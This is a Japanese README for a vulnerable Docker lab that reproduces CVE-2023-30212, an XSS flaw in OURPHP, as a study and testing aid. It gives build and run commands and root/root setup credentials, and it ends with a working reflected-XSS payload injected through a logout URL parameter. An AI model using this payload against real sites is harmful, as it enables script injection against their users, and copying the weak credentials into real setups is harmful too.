
これは、XSS脆弱性(CVE-2023-30212)を持つOURPHPの脆弱性を再現するために必要なディレクトリとDockerfileを含みます。
前提条件
Dockerをダウンロード
sudo apt install -y docker.io
git cloneを使用してこのリポジトリからファイルをダウンロード
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
この中には、シナリオを再現するために必要なディレクトリとdockerfileが含まれています。
ファイルをダウンロードした後、以下のコマンドでdockerイメージをビルドします。
sudo docker build -t <Give_Suitable_Docker_name> . .
! 後で呼び出せるように、Dockerイメージに名前を付けてください。
以下のコマンドでDockerイメージをコンテナに変換します。
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! ここではコンテナポートがポート80にマッピングされています。
Dockerコンテナのステータスを確認するには、
sudo docker ps
これらの手順を実行した後、
localhostにアクセスし、次の資格情報でOURPHPを設定します。 ユーザー名 : root パスワード : root データベース名: data
次に、管理用のユーザー名とパスワードを設定する必要があります。次のように設定します: ユーザー名: root パスワード: root そして続行します。
したがって、ペイロードは
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
これをlocalhostまたは127.0.0.1に追加してXSSをトリガーします。